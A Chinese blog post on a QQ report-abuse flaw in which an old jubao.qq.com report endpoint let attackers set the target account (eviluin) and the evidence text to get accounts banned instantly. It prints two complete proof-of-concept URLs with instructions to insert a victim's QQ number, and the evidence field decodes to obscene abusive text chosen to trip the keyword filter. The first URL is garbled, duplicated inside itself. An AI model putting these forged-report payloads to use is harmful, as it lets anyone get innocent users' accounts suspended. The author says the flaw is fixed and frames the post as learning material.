最近两天QQ出现了大规模封号的情况，当然，我在推送群里的几个QQ也被封了，自己用的大号还健在。

结果就有热心网友找到了漏洞相关的POC，先对马叔叔（10001）进行了一波尝试，结果发现没有效果。

然后就拿我大号进行了测试，当时，我正好在吃饭，结果GG了……

漏洞产生的原因

• 客户端版本较多导致可能存在一些没有废弃的旧版接口
• 可以在URL中修改eviluin、text_evidence字段，就可以修改要举报的QQ号和证据

漏洞POC

目前看应该是已经和谐了，我们将其中的URL也分享出来供大家学习参考

漏洞URL样本一

您需要将QQ号替换为目标的QQ号

    


        


        

        


        

        


        

    

    


        


            

                https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=QQ号&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A 
            

        

    

我们分析下上面的一些字段，目标QQ号使用的是eviluin，举报证据字段如下

    


        


        

        


        

        


        

    

    


        


            

                text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91; 
            

        

    

通过URL解码，我们可以看到里面有一些关键词，正是命中了这些关键词导致的用户被立刻封号
漏洞URL样本二

QQ号需要修改为目标QQ号

    


        


        

        


        

        


        

    

    


        


            

                https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=QQ号&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A 
            

        

    

以上两个样本可以造成封号1、7天，其实就是利用了这些字段可以随意修改，而且大概率是从旧版电脑QQ上遗留的部分功能导致的。因此，做安全喜欢考古是一个很不错的思路，比方说从以前的老版本的应用上寻找一些可能还遗留的接口进行参数篡改，就会导致网上说的这种无违规(wwg)封号的情况

POC验证

在输入上面的URL，在手机客户端访问后，可以看到举报成功

当然我自己的号也不例外，被热心网友安排了一天的套餐

你可以去安全中心，输入对应的QQ检测封号情况

    


        


        

        


        

        


        

    

    


        


            

                https://accounts.qq.com/login/limit 
            

        

    

目前可以看到很多大佬的QQ都因为这个漏洞被临时封禁了

很多短位或者靓号也被热心网友给搞封了

这个漏洞目前应该是已经修复了，而且通过这个漏洞被封禁的账户现在也都解封了